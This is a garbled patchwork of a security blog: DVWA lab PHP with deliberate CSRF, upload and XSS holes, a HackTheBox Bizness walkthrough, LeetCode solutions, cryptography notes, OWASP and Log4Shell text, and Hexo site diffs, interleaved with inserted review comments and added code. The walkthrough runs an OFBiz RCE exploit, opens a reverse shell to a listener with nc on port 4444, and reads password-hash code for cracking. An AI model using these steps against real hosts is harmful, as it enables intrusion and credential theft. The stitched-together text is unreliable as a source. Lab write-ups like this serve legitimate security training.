    class G danger;
sequenceDiagram
    %% On first load the frontend asks the backend to sync with version 0; the backend returns the data together with the highest version
    前端->>前端: 用户首次打开前端页面
    前端->>后台: version : 0 请求同步数据
    后台->>前端: 返回数据,同时携带最大的version
    note right of 后台: 返回数据结构:{"version":100, data:[{},{},{}]}
SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections
Blind SQL and Blind OS Command injection
Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)
Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)
Cross-Site Request Forgery (CSRF)
AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)
Malicious, unrestricted file uploads and backdoor files
Authentication, authorization and session management issues
Arbitrary file access and directory traversals
Local and remote file inclusions (LFI/RFI)
Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,...
HTTP parameter pollution and HTTP response splitting
Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion
Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations
HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
Unvalidated redirects and forwards, and cookie poisoning
Cookie poisoning and insecure cryptographic storage
Server Side Request Forgery (SSRF)
XML External Entity attacks (XXE)
And much much much more…
// Checks to see where the request came from
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

The Referer header is checked (a stripos substring match against SERVER_NAME).

GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1
Host: 49.232.78.252:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Referer: http://49.232.78.252:81/vulnerabilities/csrf/
Cookie: PHPSESSID=9mjbjlhio6pup4mq4ne932fbo2; security=medium
Upgrade-Insecure-Requests: 1
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
    ( $uploaded_size < 100000 ) ) {

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
else {
    // Invalid file
    echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
// Check CAPTCHA from 3rd party
$resp = recaptcha_check_answer(
    $_DVWA[ 'recaptcha_private_key'],
    $_POST['g-recaptcha-response']
);

// Did the CAPTCHA fail?
if( !$resp ) {
    // What happens when the CAPTCHA was entered incorrectly
    $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
    $hide_form = false;
    return;
}
else {
    // CAPTCHA was correct. Do both new passwords match?
    if( $pass_new == $pass_conf ) {
        // Show next stage for the user
        echo "
            <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
            <form action=\"#\" method=\"POST\">
                <input type=\"hidden\" name=\"step\" value=\"2\" />
                <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
                <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
                <input type=\"submit\" name=\"Change\" value=\"Change\" />
            </form>";
    }
    else {
        // Both new passwords do not match.
        $html     .= "<pre>Both passwords must match.</pre>";
        $hide_form = false;
    }
}
}
// Check to see if both password match
if( $pass_new == $pass_conf ) {
    // They do!
    $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_new = md5( $pass_new );

    // Feedback for the end user
    echo "<pre>Password Changed.</pre>";
}
else {
    // Issue with the passwords matching
    echo "<pre>Passwords did not match.</pre>";
    $hide_form = false;
}
?>
<?php
if (isset ($_POST['include'])) {
    $page[ 'body' ] .= "
    " . $_POST['include'] . "
    ";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
';
Recursive method:

from typing import List

class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        m = len(matrix)
        if m == 0 or len(matrix[0]) == 0:
            return []
        n = len(matrix[0])
        newlist = list(matrix[0])                 # top row, left to right
        if m > 1:
            for i in range(1, m):                 # right column, top to bottom
                newlist.append(matrix[i][n - 1])
            for j in range(n - 2, -1, -1):        # bottom row, right to left
                newlist.append(matrix[m - 1][j])
            if n > 1:
                for i in range(m - 2, 0, -1):     # left column, bottom to top (row indices, so bounded by m)
                    newlist.append(matrix[i][0])
            M = []                                # inner sub-matrix: strip the outer ring and recurse
            for k in range(1, m - 1):
                M.append(matrix[k][1:-1])
            newlist.extend(self.spiralOrder(M))
        return newlist
Clearer method (four shrinking boundaries):

from typing import List

class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        res = []
        if len(matrix) == 0:
            return []
        # define the four boundary indices
        left = 0
        right = len(matrix[0]) - 1
        top = 0
        bottom = len(matrix) - 1
        # walk one ring per iteration while the boundaries have not crossed
        while top < bottom and left < right:
            for i in range(left, right):
                res.append(matrix[top][i])
            for i in range(top, bottom):
                res.append(matrix[i][right])
            for i in range(right, left, -1):
                res.append(matrix[bottom][i])
            for i in range(bottom, top, -1):
                res.append(matrix[i][left])
            left += 1
            top += 1
            right -= 1
            bottom -= 1
        # if a single row or a single column is left, take it in one pass
        if top == bottom:
            for i in range(left, right + 1):
                res.append(matrix[top][i])
        elif left == right:
            for i in range(top, bottom + 1):
                res.append(matrix[i][left])
        return res
Any polynomial can be written as f(x) = q(x)g(x) + r(x); r(x) is called the remainder, r(x) = f(x) mod g(x).
If there is no remainder, g(x) divides f(x), written g(x) | f(x).
If f(x) has no factors other than itself and 1, f(x) is called an irreducible polynomial (also a prime polynomial).
Polynomials with coefficients in GF(p), taken modulo an irreducible polynomial, form a field.
Euclidean algorithm

a can be written as a = kb + r (a, b, k, r positive integers with r < b); then r = a mod b.
Suppose d is a common divisor of a and b, written d|a and d|b, i.e. both a and b are divisible by d.
Since r = a - kb, dividing both sides by d gives r/d = a/d - kb/d = m; the right-hand side shows m is an integer, so d|r.
Hence d is also a common divisor of b and a mod b.
Conversely, suppose d is a common divisor of b and a mod b. Then d|b and d|(a - k*b) with k an integer, so d|a; hence d is also a common divisor of a and b.
Therefore (a, b) and (b, a mod b) have exactly the same common divisors, so their greatest common divisors are equal. QED.
Any integer that divides both a and b also divides a - b (and b); taking that integer to be gcd(a, b), it can be no larger than the gcd of a - b and b: gcd(a, b) <= gcd(a - b, b).
Likewise, any integer that divides a - b and b also divides a and b; taking it to be gcd(a - b, b) gives gcd(a - b, b) <= gcd(a, b).
Hence gcd(a, b) = gcd(a - b, b).
Since there is always an integer n with a - n*b = a mod b, iterating gives gcd(a - b, b) = gcd(a - 2b, b) = ... = gcd(a - n*b, b) = gcd(a mod b, b).
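As an added example (not code from the original notes), the Euclidean step just proved, carried through in Python for integers and then for polynomials over GF(2), which the notes above on polynomial remainders and GF(p) fields describe: polynomials are packed into ints (bit i is the coefficient of x^i) so that addition is XOR, and the extended algorithm yields the inverse modulo an irreducible polynomial. The modulus x^8 + x^4 + x^3 + x + 1 (0x11B) is assumed here as the example field.

```python
"""Euclid over the integers and over GF(2)[x]. Added example; the reducing polynomial
0x11B (x^8 + x^4 + x^3 + x + 1) is an assumption chosen for the GF(2^8) demonstration."""


def gcd_steps(a: int, b: int) -> list:
    """Every (a, b) pair visited by gcd(a, b) = gcd(b, a mod b), last pair has b == 0."""
    steps = [(a, b)]
    while b:
        a, b = b, a % b
        steps.append((a, b))
    return steps


def ext_gcd(a: int, b: int) -> tuple:
    """Return (g, x, y) with g = gcd(a, b) and a*x + b*y = g (Bezout coefficients)."""
    x0, y0, x1, y1 = 1, 0, 0, 1
    while b:
        q, r = divmod(a, b)
        a, b = b, r
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0


def poly_degree(p: int) -> int:
    return p.bit_length() - 1          # degree of the zero polynomial comes out as -1


def poly_divmod(f: int, g: int) -> tuple:
    """Long division in GF(2)[x]: (q, r) with f = q*g + r and deg r < deg g."""
    if g == 0:
        raise ZeroDivisionError("division by the zero polynomial")
    q, r, dg = 0, f, poly_degree(g)
    while r and poly_degree(r) >= dg:
        shift = poly_degree(r) - dg    # leading term of r divided by leading term of g
        q ^= 1 << shift
        r ^= g << shift                # subtraction is XOR in characteristic 2
    return q, r


def poly_mul(a: int, b: int) -> int:
    """Carry-less product of two GF(2) polynomials (no reduction)."""
    res = 0
    while b:
        if b & 1:
            res ^= a
        a <<= 1
        b >>= 1
    return res


def poly_gcd(f: int, g: int) -> int:
    """Same recurrence as the integer case: gcd(f, g) = gcd(g, f mod g)."""
    while g:
        f, g = g, poly_divmod(f, g)[1]
    return f


def poly_inverse(a: int, mod: int) -> int:
    """Inverse of a modulo mod via the extended algorithm; keeps r_i = s_i * a (mod mod)."""
    if a == 0:
        raise ZeroDivisionError("zero has no inverse")
    r0, r1 = mod, a
    s0, s1 = 0, 1
    while r1:
        q, r = poly_divmod(r0, r1)
        r0, r1 = r1, r
        s0, s1 = s1, s0 ^ poly_mul(q, s1)
    if r0 != 1:                        # gcd is not 1: a shares a factor with the modulus
        raise ValueError("not invertible; the modulus is not irreducible or a is a multiple of a factor")
    return poly_divmod(s0, mod)[1]


def is_irreducible(p: int) -> bool:
    """Naive check: no polynomial of degree 1 .. deg(p)//2 divides p (fine for small degrees)."""
    d = poly_degree(p)
    return all(poly_divmod(p, g)[1] != 0 for g in range(2, 1 << (d // 2 + 1)))
```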
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
It does not depend on a browser, so you can even run it on Node.js.
Use the form below to convert your own script. Uncheck “eval source” to get back a plain string.
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Notice that the solution set must not contain duplicate triplets.
parser.add_argument("--square", help="display a square of a given number", type=int)
parser.add_argument("--cubic", help="display a cubic of a given number", type=int)
%% extract watermark
FA2 = fft2(FAO);                       % spectrum of the watermarked image
G = (FA2 - FA) / alpha;                % difference to the original spectrum, scaled back by the embedding strength
GG = G;
% undo the pixel shuffle given by the index arrays M and N used at embedding time
for i = 1:imsize(1)*0.5
    for j = 1:imsize(2)
        GG(M(i), N(j), :) = G(i, j, :);
    end
end
% mirror the upper half into the lower half (conjugate-symmetric layout)
for i = 1:imsize(1)*0.5
    for j = 1:imsize(2)
        GG(imsize(1)+1-i, imsize(2)+1-j, :) = GG(i, j, :);
    end
end
figure, imshow(GG); title('extracted watermark');
%imwrite(uint8(GG),'extracted watermark.jpg');
Cross-Site Scripting (XSS). XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Insecure Deserialization. Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
Using Components with Known Vulnerabilities. Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
Insufficient Logging & Monitoring. Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
+
+
+
+
+ <blockquote>
+<p>The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consens
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 浏览器的同源策略与跨站请求伪造(CSRF)
+
+ http://h4m5t.github.io/2021/01/27/%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5/
+ 2021-01-27T16:00:00.000Z
+ 2024-09-24T05:05:42.000Z
+
+ 定义
信息收集123456789101112┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]└─# nmap -p- $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AESTNmap scan report for bizness.htb (10.129.232.1)Host is up (0.040s latency).Not shown: 65531 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http443/tcp open https41845/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 12.65 seconds
+
+1echo "10.129.232. ...
xray下载社区版下载和使用
+注意下载新版的,旧版可能无法加载自定义POC
+https://github.com/chaitin/xray/releases
+使用方法查看help
+xray_windows_amd64.exe webscan --help
+1234567891011121314151617181920212223242526272829Version: 1.9.11/eb0c331d/COMMUNITYNAME: xray - A powerful scanner engine [https://docs.xray.cool]USAGE: [global options] command [command options] [arguments...]COMMANDS: webscan, ws Run a webscan task servicescan, ss Run a service scan task subdomain, sd Run a subdomain task poclint, pl, lint ...
\ No newline at end of file
diff --git a/page/2/index.html b/page/2/index.html
new file mode 100644
index 000000000..e8625b9ba
--- /dev/null
+++ b/page/2/index.html
@@ -0,0 +1,346 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
HexoWelcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
+Quick StartCreate a new post1$ hexo new "My New Post"
+
+More info: Writing
+Clean1$ hexo clean
+
+Run server1$ hexo server
+
+More info: Server
+Generate static files1$ hexo generate
+
+More info: Generating
+Deploy to remote sites1$ hexo deploy
+
+More info: Deployment
+Actions自动化部署Hexo自动化工作流总是遇到问题,今天终 ...
+bWAPP靶场训练记录,之前就搭好的,一直没练,现在有空练一下
+
+主要内容有:一个很综合的靶场,不错!
+1234567891011121314151617181920SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injectionsBlind SQL and Blind OS Command injectionBash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)Cross-Site Request Forgery (CSRF)AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)Malicious, unrestricted file uploads and backdoor filesAuthentication, authorization and session m ...
\ No newline at end of file
diff --git a/page/3/index.html b/page/3/index.html
new file mode 100644
index 000000000..e6aa8eb29
--- /dev/null
+++ b/page/3/index.html
@@ -0,0 +1,440 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
+李卫海PPT学习笔记
+
+其他概念Needham-Schroeder协议:
+利用对称密码技术分发密钥。A,B分别与T有静态密钥。借助信任权威T,分发对称密钥Kab
+多项式GCD算法
+重点:模重复平方算法
+123456c=1for i =k-1 to 0: c=(c^2)mod n if ei==1: c=c*m mod n return
+
+难点:AES列混合矩阵计算,有限域上的多项式模运算。
+对合算法
+对合运算:f =f‘ ,模 2加运算是对合运算。密码算法是对和运算,则加密算法=解密算法,工程实现工作量减半。
+同态加密(英语:Homomorphic encryption)是一种加密形式,它允许人们对密文进行特定形式的代数运算得到仍然是加密的结果,将其解密所得到的结果与对明文进行同样的运算结果一样。换言之,这项技术令人们可以在加密的数据中进行诸如检索、比较等操作,得出正确的结果,而在整个处理过程中无需对数据进行解密。其意义在于,真正从根本上解决将数据及其操作委托给第三方时的保密问题,例如对于各种云计算的应用。
+零知识证明是一种特殊的 ...
ISCC练武题适合新手的题,练练手
+WEB-1
+
+打开环境,是一个投票页面
+
+
+题目要求:在20秒之内让左边的票数高过右边的
+
+方法一:Python写脚本模拟点击,实现刷票
+方法二:修改左右客服的ID
+方法三:直接在控制台修改左边票数的数据
+
+WEB-2查看源码
+
+
+是JS编码
+http://www.jsfuck.com/
+打开在线网站,直接提交这串编码即出flag
+
+JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
+It does not depend on a browser, so you can even run it on Node.js.
+Use the form below to convert your own script. Uncheck “eval source” to get back a p ...
\ No newline at end of file
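Review bot: the square-and-multiply excerpt `c=1 for i =k-1 to 0: c=(c^2)mod n if ei==1: c=c*m mod n return` ends with a bare `return`; it should return `c`, and the leading `123456` in that line is the theme's line-number gutter rendered into the text, so the digits read as if they were code. Worth also saying that `ei` is bit i of the exponent e and that the loop runs from the top bit k-1 downwards, since the scan direction is the whole point of the algorithm.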
diff --git a/page/4/index.html b/page/4/index.html
new file mode 100644
index 000000000..85427d79e
--- /dev/null
+++ b/page/4/index.html
@@ -0,0 +1,426 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/page/5/index.html b/page/5/index.html
new file mode 100644
index 000000000..60a8e2114
--- /dev/null
+++ b/page/5/index.html
@@ -0,0 +1,425 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
+3sum跟之前的2sum有点像,但难度更大一些
+
+leetcode.15
+题目描述 :123Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.Notice that the solution set must not contain duplicate triplets.
+
+范围0 <= nums.length <= 3000
+方法1:枚举所有方法,时间复杂度n^3,会超时
+方法2:排序
+哈希法(2等1)
+循环i,j 此时 t=0-nums[i]-nums[j]
+根据哈希,判断t是否在数组中出现过
+注意:需要去重
+方法3:排序
+双指针(1等2)
+t=0-nums[i]-nums[j]
+思路:
+固定i指针,j,k分别在两端,交替向中间靠拢(比较t)
+注意:去重
+代码12345678910 ...
\ No newline at end of file
diff --git a/page/6/index.html b/page/6/index.html
new file mode 100644
index 000000000..48d581252
--- /dev/null
+++ b/page/6/index.html
@@ -0,0 +1,381 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/page/7/index.html b/page/7/index.html
new file mode 100644
index 000000000..6051ef35c
--- /dev/null
+++ b/page/7/index.html
@@ -0,0 +1,450 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
+The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
+
+
+注入
+失效的身份验证
+敏感信息泄露
+XML外部实体(XXE)
+失效的访问控制
+安全配置错误
+跨站脚本(XSS)
+不安全的反序列化
+使用含有已知漏洞的组件
+不足的日志记录和监控
+
+
+
+Injection. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into execu ...
\ No newline at end of file
diff --git a/page/8/index.html b/page/8/index.html
new file mode 100644
index 000000000..93a6142af
--- /dev/null
+++ b/page/8/index.html
@@ -0,0 +1,462 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There's an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There's also an arbitrary file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# nmap -p- $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AEST
Nmap scan report for bizness.htb (10.129.232.1)
Host is up (0.040s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
443/tcp   open  https
41845/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 12.65 seconds

echo "10.129.232.1 bizness.htb" | sudo tee -a /etc/hosts
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# update-alternatives --config java
There are 3 choices for the alternative java (providing /usr/bin/java).

Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/lib/jvm/java-11-openjdk-arm64/bin/java to provide /usr/bin/java (java) in manual mode

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# java --version
openjdk 11.0.20-ea 2023-07-18
OpenJDK Runtime Environment (build 11.0.20-ea+7-post-Debian-1)
OpenJDK 64-Bit Server VM (build 11.0.20-ea+7-post-Debian-1, mixed mode)
Start tcpdump:
sudo tcpdump -i 2 icmp
Run the PoC:

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# python3 exploit.py https://bizness.htb rce "ping -c 5 10.10.14.8"
Not Sure Worked or not
Check the captured packets:

┌──(root@kali)-[/home/h4m5t/Desktop]
└─# tcpdump -i 2 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes
21:47:38.693694 tun0  In  IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 1, length 64
21:47:38.693728 tun0  Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 1, length 64
21:47:39.695235 tun0  In  IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 2, length 64
21:47:39.695274 tun0  Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 2, length 64

The ICMP echo requests from the target confirm RCE; next, get a reverse shell.
First start an nc listener, then run the exploit:
nc -nlvp 4444
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# python3 exploit.py https://bizness.htb shell 10.10.14.8:4444
Not Sure Worked or not

ofbiz@bizness:/opt/ofbiz/framework/security/config$ cat security.properties | grep hash
<ecurity/config$ cat security.properties | grep hash
# -- specify the type of hash to use for one-way encryption, will be passed to java.security.MessageDigest.getInstance() --
password.encrypt.hash.type=SHA
cat HashCrypt.java
/*******************************************************************************
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied.  See the License for the
 * specific language governing permissions and limitations
 * under the License.
 *******************************************************************************/
package org.apache.ofbiz.base.crypto;

    private static boolean doCompareTypePrefix(String crypted, String defaultCrypt, byte[] bytes) {
        int typeEnd = crypted.indexOf("}");
        String hashType = crypted.substring(1, typeEnd);
        String hashed = crypted.substring(typeEnd + 1);
        MessageDigest messagedigest = getMessageDigest(hashType);
        messagedigest.update(bytes);
        byte[] digestBytes = messagedigest.digest();
        char[] digestChars = Hex.encodeHex(digestBytes);
        String checkCrypted = new String(digestChars);
        if (hashed.equals(checkCrypted)) {
            return true;
        }
        // This next block should be removed when all {prefix}oldFunnyHex are fixed.
        if (hashed.equals(oldFunnyHex(digestBytes))) {
            Debug.logWarning("Warning: detected oldFunnyHex password prefixed with a hashType; this is not valid, please update the value in the database with ({%s}%s)", module, hashType, checkCrypted);
            return true;
        }
        return false;
    }

    /*
     * @deprecated use cryptBytes(hashType, salt, password); eventually, use
     * cryptUTF8(hashType, salt, password) after all existing installs are
     * salt-based. If the call-site of cryptPassword is just used to create a *new*
     * value, then you can switch to cryptUTF8 directly.
     */
    @Deprecated
    public static String cryptPassword(String hashType, String salt, String password) {
        if (hashType.startsWith("PBKDF2")) {
            return password != null ? pbkdf2HashCrypt(hashType, salt, password) : null;
        }
        return password != null ? cryptBytes(hashType, salt, password.getBytes(UtilIO.getUtf8())) : null;
    }

            messagedigest.update(strBytes);
            return oldFunnyHex(messagedigest.digest());
        } catch (Exception e) {
            Debug.logError(e, "Error while computing hash of type " + hashType, module);
        }
        return str;
    }

    // This next block should be removed when all {prefix}oldFunnyHex are fixed.
    private static String oldFunnyHex(byte[] bytes) {
        int k = 0;
        char[] digestChars = new char[bytes.length * 2];
        for (byte b : bytes) {
            int i1 = b;
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed.
graph LR
    A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?}
    C -->|Yes| D[Execute<br>JNDI lookup]
    C -->|No| E[Normal log]
    D --> F[Connect to<br>attacker's server]
    F --> G[Download &<br>execute<br>malicious codes]
    G --> H[Attacker gains<br>server control]
Incident Timeline
timeline
    title Log4j Vulnerability Incident Timeline
    November 24, 2021 : Alibaba researchers discovered Log4Shell and reported it to Apache
    December 10, 2021 : Apache disclosed the Log4j vulnerability (CVSS score 10.0)
    December 13, 2021 : Bitdefender reported attempts to exploit Log4j for Khonsari ransomware
    December 22, 2021 : U.S. CISA, FBI, NSA, and Five Eyes Alliance issued a joint security alert
    December 23, 2021 : Belgium Ministry of Defense confirmed Log4j attack
    December 2021 : Apache released 4 patches to fully fix the Log4j vulnerability
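As an added example (not the blog's own code), two checks a defender can take straight from the CVE text above: a version-range test for the affected Log4j 2 releases (2.0-beta9 through 2.15.0, minus the 2.12.2, 2.12.3 and 2.3.1 security releases) for use in a dependency inventory, and a first-pass scan of access-log lines for the JNDI lookup the diagram describes. The sample log lines are constructed.

```python
"""Log4Shell exposure checks. Added example; the sample access-log lines are constructed."""
import re

# Security releases inside the affected range that already contain the fix
SECURITY_RELEASES = {(2, 12, 2), (2, 12, 3), (2, 3, 1)}
# Pre-release tags sort before a final release of the same number (final gets rank 3)
_PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
_VERSION_RE = re.compile(r"(\d+(?:\.\d+)*)(?:-(alpha|beta|rc)(\d*))?", re.IGNORECASE)


def version_key(version: str) -> tuple:
    """'2.0-beta9' -> ((2, 0, 0), 1, 9); '2.15.0' -> ((2, 15, 0), 3, 0). Keys compare in release order."""
    m = _VERSION_RE.fullmatch(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    nums = tuple(int(x) for x in m.group(1).split("."))
    nums = (nums + (0, 0, 0))[:3]                     # pad to major.minor.patch
    rank = _PRE_RANK[m.group(2).lower()] if m.group(2) else 3
    pre_no = int(m.group(3)) if m.group(3) else 0
    return nums, rank, pre_no


def is_affected_log4j2(version: str) -> bool:
    """True when a Log4j 2 version string falls in the CVE's affected range."""
    key = version_key(version)
    nums = key[0]
    if nums[0] != 2:
        return False                                   # Log4j 1.x is a different code base, out of scope here
    if key[1] == 3 and nums in SECURITY_RELEASES:
        return False
    return version_key("2.0-beta9") <= key <= version_key("2.15.0")


# The lookup prefix the diagram's decision node keys on; case-insensitive, tolerant of stray whitespace
LOOKUP_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_jndi_lookups(lines) -> list:
    """(line_no, line) for each line carrying a ${jndi: lookup.
    This is a first pass only: Log4j resolves nested lookups before the prefix is visible,
    so a production rule must normalise such variants before matching."""
    return [(n, line) for n, line in enumerate(lines, start=1) if LOOKUP_RE.search(line)]


SAMPLE_ACCESS_LOG = [  # constructed sample: user-agent strings are a logged, attacker-controlled field
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /health HTTP/1.1" 200 "curl/7.79"',
]


def scan_sample() -> list:
    """Run the scanner over the constructed sample; only the second line should match."""
    return find_jndi_lookups(SAMPLE_ACCESS_LOG)


if __name__ == "__main__":
    for v in ("2.0-beta9", "2.3.1", "2.14.1", "2.15.0", "2.16.0"):
        print(v, "affected" if is_affected_log4j2(v) else "not affected")
    for n, line in scan_sample():
        print(f"line {n}: JNDI lookup present")
```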
┌──(root@kali)-[/home/h4m5t/Desktop/HTB]
└─# nmap -sV $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 14:53 AEST
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:57 (0:01:15 remaining)
Nmap scan report for 10.129.231.241
Host is up (0.0093s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

